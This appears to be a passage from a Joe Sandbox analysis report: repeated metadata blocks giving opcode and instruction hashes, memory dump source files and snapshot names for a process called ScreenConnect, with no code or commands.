                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9f9e778ced071d9cc1491053041df68001f9c3ef590340bfb24f015792b21d79
                                                                                                                                                                                                  • Instruction ID: 85c1d4bce5cf49a8f54aa668c8cf9e969a26303210146bed6994dc884601c18c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f9e778ced071d9cc1491053041df68001f9c3ef590340bfb24f015792b21d79
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1601B5312097554FC306CB78DC819967BF5DF862603198666F448CF7A1DA34EC07C761
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 44b8f6eb321f4dc78eae1eeaa0700b1d3121d156f6fed8b8758f7d8d85733df6
                                                                                                                                                                                                  • Instruction ID: 38ccc3d7d0d8d5b5632d824e9abb96eda7f4c4c1a2abbcfdd24205e0815b8291
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44b8f6eb321f4dc78eae1eeaa0700b1d3121d156f6fed8b8758f7d8d85733df6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D11247690021ADFCF00DFA4C980ADEBBF5FF49704F108555E904BB250D771AA1ACB91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 22f1ab0160401c0b497cac4e0bb1d1a5efcb1f36f27d99432e382b09a56e6a4a
                                                                                                                                                                                                  • Instruction ID: 6d68a58a4d70a2e2673dd912cb6eb51121433298f5ea01a1c8224f9fba2932ba
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22f1ab0160401c0b497cac4e0bb1d1a5efcb1f36f27d99432e382b09a56e6a4a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5018F777440148B8788DA6DF894A7EB3AAFBC8635328C43BEA09C7351CA32DC138754
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d4f695ef4da1a65c1fcfa2ce62ea3c6caaac0bfe8d994a7459f2a9725f9babda
                                                                                                                                                                                                  • Instruction ID: e703ee30fa9ef3af4c270a18413fcc8047fca5deaf09721ec4a5792f363003af
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4f695ef4da1a65c1fcfa2ce62ea3c6caaac0bfe8d994a7459f2a9725f9babda
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9119D3190020E9FCB42DFA8C880ADDFBB2BF86304B48C554D005AB155D730AA86CB61
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ce173cc582291faf70d2176fda85caa8b65d065ed09ea1ac88211f03c9b036f7
                                                                                                                                                                                                  • Instruction ID: 6345c2b5deb2989ba20ff8147dcdad2ba8b8f5d152472c71dbbf0e7371202b31
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce173cc582291faf70d2176fda85caa8b65d065ed09ea1ac88211f03c9b036f7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8111571E0520D8FEF15DBA4C8A1BED77B2AB8A300F004569D002BB3A0DB781A45CBA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 25352b0bf2bdce08d33de32302816cb8d8e5bee8a312052f14d6738592f14a0c
                                                                                                                                                                                                  • Instruction ID: 66e5ecbdd280daaf80fea086a2e13a595d5ec6c855e07a99384119afc96bf8f5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25352b0bf2bdce08d33de32302816cb8d8e5bee8a312052f14d6738592f14a0c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B11D671A0421D8FEF55DFA4D8646EDB7B1AF8E310F000469D005BB2A0DB781A44CBA1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: af5f2edeb3ac8e3e35ab7776d6cd2cd73daf31adcafdb9bc087caa006a0cebef
                                                                                                                                                                                                  • Instruction ID: f0a1561c6ac564a0ea6e107a6b9d95bbfed41e439f7e424183cc9d32486a419f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: af5f2edeb3ac8e3e35ab7776d6cd2cd73daf31adcafdb9bc087caa006a0cebef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB11123690120A9FCF00DFA4D9409DEBBF5FF49714B108569D509BB250D771AA0ACB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4b9fe03f1e3cbae332257a86d3bc53e12588897d1eef27db0fd1109dd74eb8c9
                                                                                                                                                                                                  • Instruction ID: 19cf6add748e8388be7f49d5f09957a69d47167163fb7e1e1375ff7348f2507e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b9fe03f1e3cbae332257a86d3bc53e12588897d1eef27db0fd1109dd74eb8c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97012671B003196BCB49DA5DEC444AFB7EAFBC8220320492AD105CB341EBB1DD0687C4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 12dc8cc7bd8580f79bb084554e6f0434bae7bdae89f9226aa5de102d6d555478
                                                                                                                                                                                                  • Instruction ID: 7adcc4668b068ee8ed918896e5db08111dbd3f3f37cdccdec118a026a0d5d765
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12dc8cc7bd8580f79bb084554e6f0434bae7bdae89f9226aa5de102d6d555478
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D401F9B29492408FC712C7B8ECE97C8BBE4EE52225709049AD585CB602D3752647CB92
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 51dd52dd9cb0cfa1c86b6a85c29fe813550d5944fbccd10a9b8ac1e0ad0ac6f8
                                                                                                                                                                                                  • Instruction ID: fd081ab6ca99445e4c9170f40499c335fa91004949d5251f9248c43d700ee43a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51dd52dd9cb0cfa1c86b6a85c29fe813550d5944fbccd10a9b8ac1e0ad0ac6f8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101F2315447409FE7208AA5C984B67FF98EF812A4F58C25AED484A682C2B99801CAB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5cc4c4bb47b8bd1848d67e20c2178015e9670d5cd011da0a34a7189bfd8a8558
                                                                                                                                                                                                  • Instruction ID: 42ba5c62e233bf359c5e5653b79e6f5c5ccc6c260f6ca6a0b7233a8ae4edea4d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cc4c4bb47b8bd1848d67e20c2178015e9670d5cd011da0a34a7189bfd8a8558
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E201F76290E3DD8FC3438B748CA8661BFA1EE5235430C45DEE485CF1E3E794AA02D342
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: bb022f68b8749672f871e38e2c19e79146828bdd6526604360388ce64235e990
                                                                                                                                                                                                  • Instruction ID: dba7e1b94412408ade0106e227a45f132e7a78479f6888155417041b95e81e1e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb022f68b8749672f871e38e2c19e79146828bdd6526604360388ce64235e990
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4201693190121D9BCB05EFA9D804ACEFBB2FF89314F048466E9057B250D730690ACB90
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1e5418e0d3a01c95289899897ebb4375e1b4768d1bb7c621ea79491d05554f07
                                                                                                                                                                                                  • Instruction ID: 7d569da501e46b435ec58e27c285f43431109bbe25ffd97e6016ba90c7723091
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e5418e0d3a01c95289899897ebb4375e1b4768d1bb7c621ea79491d05554f07
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02F0B433A4E2844FC7174B799C955953FB4DD8622130E01E7E449CB243D5145C0AC760
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3fbef39ce66377b2aa7fc5165fe07627fc3fb093ee550bc2f72a2a36f6d4bc48
                                                                                                                                                                                                  • Instruction ID: d8216c0f2fa752941fe576dad402fe9cb57fc6e6ae391e46b1c3fd996d3af5b1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fbef39ce66377b2aa7fc5165fe07627fc3fb093ee550bc2f72a2a36f6d4bc48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95012C31D0125D9BCB04DFA9D8049CEFBB6FFC9714F058526D505B7250DB306906CB94
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1293dfd2172c0614e2c9e447cc1b50c184e8ba42cac780e6dfd0a37c71624836
                                                                                                                                                                                                  • Instruction ID: d0c2341dced5d778f71ae4e1f0979bdd41593c87a68d5f5cf339b6ac2932a4cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1293dfd2172c0614e2c9e447cc1b50c184e8ba42cac780e6dfd0a37c71624836
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF062313007155FD714DF69DC84B5BB7EAEF892A0B00462AF808CB294DB71EC418790
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a3008e43f7c04965981e67b53cf2601b383051ad6ddc126a8321db7eef0369a7
                                                                                                                                                                                                  • Instruction ID: 29410a3eb5b7b9805a9cdf631e5c90f5696f9f30fcc33e23d17568260f6ae7b7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3008e43f7c04965981e67b53cf2601b383051ad6ddc126a8321db7eef0369a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11019E70C0434A8FCB52CF68C89566D7FF0AF06320F24429AD465DB292E3348252CF91
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 539095a0c98e12691e5fa90e5e15942c88f44ef740948c05270fddd5c357f893
                                                                                                                                                                                                  • Instruction ID: 118408eb4a6d3191c5d3dd017384a884fbe747c08fae8ef35a8a024e7122042e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 539095a0c98e12691e5fa90e5e15942c88f44ef740948c05270fddd5c357f893
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98F05836B092085BE728CAAEA800A9BBBDACBC4620B14C07FE54DC3680E931A5008764
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596143766.00000000017AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017AD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_17ad000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 931a545127b942010b64b4e3578fbdd13c0678519bb14c3e410784ee8ef9c35a
                                                                                                                                                                                                  • Instruction ID: 3aff65aba71b2c010b11e771503af3d9ccbbb1e55922159d7d40992aa7dd8354
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 931a545127b942010b64b4e3578fbdd13c0678519bb14c3e410784ee8ef9c35a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0FF0CD72404744AEEB208A1AC984B67FFD8EB81665F18C15AED580A286C2799840CAB1
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3404ab45dd3530a0bc4d14cdabdccf7d40188a7ea1e5dac92f8dfeee14de67f0
                                                                                                                                                                                                  • Instruction ID: 808bee3a8d86d350160cea1cfdec710eb0e520a09238f4da896205335d7680aa
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3404ab45dd3530a0bc4d14cdabdccf7d40188a7ea1e5dac92f8dfeee14de67f0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F0827730421D6BCF059E999C509EF7FABEBC8360B40402AFA09C3251DB72991197E5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e93f1095b4f43a42358f6e07465aa9313c004facc53c6bd85d7f67583455c4e9
                                                                                                                                                                                                  • Instruction ID: bdef4339b8173134deef2cc669c1239ddaa77c3c08172d42161faf1b96135eca
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e93f1095b4f43a42358f6e07465aa9313c004facc53c6bd85d7f67583455c4e9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0F05E313003095F9714DA69DC8495BB7EAEF892A0314862AE819CB394EB71ED4187A0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9ae3353e3593b3a39cd103d31c6626c194452524a0de3f3383d8f7aa42414f23
                                                                                                                                                                                                  • Instruction ID: 9b1e395587cec2b2a83c2a85b75710f3c4383bed09c52ec0286963a921dc9357
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ae3353e3593b3a39cd103d31c6626c194452524a0de3f3383d8f7aa42414f23
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EF05E313003195FD710DAA9E884D5BB7E9EF892A43148629E819CB394EA71ED0587A0
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 54c86eadecad09ba60f3c6edb36ee3268cac688e9523e68ea8f1a9445df9f4a8
                                                                                                                                                                                                  • Instruction ID: 2eaba3c7defba022be017abbd7a96e6a512f3df105cb06f061c369a8a0989d0d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54c86eadecad09ba60f3c6edb36ee3268cac688e9523e68ea8f1a9445df9f4a8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F082717043059BC3A2A65BEC9496FB7DAEBC8A64314842AE319C7350EF65EC054794
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 9436804d0fc3bd6cd8659745eea7423994294a6d9edfc46ea98deb7083cad909
                                                                                                                                                                                                  • Instruction ID: 83deb1912d938d86e0bba1b5d6843c800fcabb7569a36c542de943499ec9021e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9436804d0fc3bd6cd8659745eea7423994294a6d9edfc46ea98deb7083cad909
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51F08C76A0D2485FD726DABEAC0199A7FE9CF85214B0581AAD448D3641E930A50087A5
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 556830fd11cd58cce909e8b6574e9500137a248854d8d2cd371a050bed938a15
                                                                                                                                                                                                  • Instruction ID: f04631e7ab301811948f6b9da41be3e7b92b79763fd02aa370669bf8510a129b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 556830fd11cd58cce909e8b6574e9500137a248854d8d2cd371a050bed938a15
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2F055317003445FC719AFAAE8D8A6E7FE6EFC8A60308856EE109C7345CE3088078B50
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6274cbc17ab370166ed0fb98914f3d839d0962a2b949bdf51056c7ab8b3e447d
                                                                                                                                                                                                  • Instruction ID: 389145a8a611e6417bc88e00a1eb059cf7ee3a5931631e3ee05db96a3c453888
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6274cbc17ab370166ed0fb98914f3d839d0962a2b949bdf51056c7ab8b3e447d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8F0E974A05209DFD705CF64DC95A29BBB4EF82300B00C4AADC00D7381C7319E21C750
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: ef3644dd36d82e3d771b2b281af224b527525c88dfbbf9bbc65798b1b61c331e
                                                                                                                                                                                                  • Instruction ID: 05a31b4897a1333f568318e5d6a630b21e084ac6eb4504c343779e7680d7abe8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef3644dd36d82e3d771b2b281af224b527525c88dfbbf9bbc65798b1b61c331e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4EF0F970D0420CEFCB85EFA8D9863ADBBF0FB04305F5045A8D905A7254D7341B51CB41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 29eb0a2b33ba09e65cd924c1d40805b0b1f64636bf0b5136855349adc4ebc9e3
                                                                                                                                                                                                  • Instruction ID: 6029b8eaeb874ee5c35d498888809853b4a007f415f8f2712127b2ca6be5ab98
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29eb0a2b33ba09e65cd924c1d40805b0b1f64636bf0b5136855349adc4ebc9e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9F0F470E0020CEFCB89EFA8D9456ADBBF1FB44345F1046A8D905A7290DB306F41CB41
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f459433115d380074ca95e631f5c3b34fafa3d062a80472f5902ecb4d69df26a
                                                                                                                                                                                                  • Instruction ID: fa01ce78e92d6bbe357a642587d156dd0585793cf792c60dd96daa3336e4c292
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f459433115d380074ca95e631f5c3b34fafa3d062a80472f5902ecb4d69df26a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73F059724082584FD757D72CFC413593BD1FFC5340B4907CAE441CF192D7A0AA068382
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000C.00000002.2596649948.0000000001800000.00000040.00000800.00020000.00000000.sdmp, Offset: 01800000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_1800000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 4deff0e0722cb7bae27cd8cf4ce8f39f0a040b95970d4af1241c0c092b9596c5
                                                                                                                                                                                                  • Instruction ID: 187053059a9281d06360e9ee1425cc2cf11b16fbd3017ebec151cee6c8e2892b
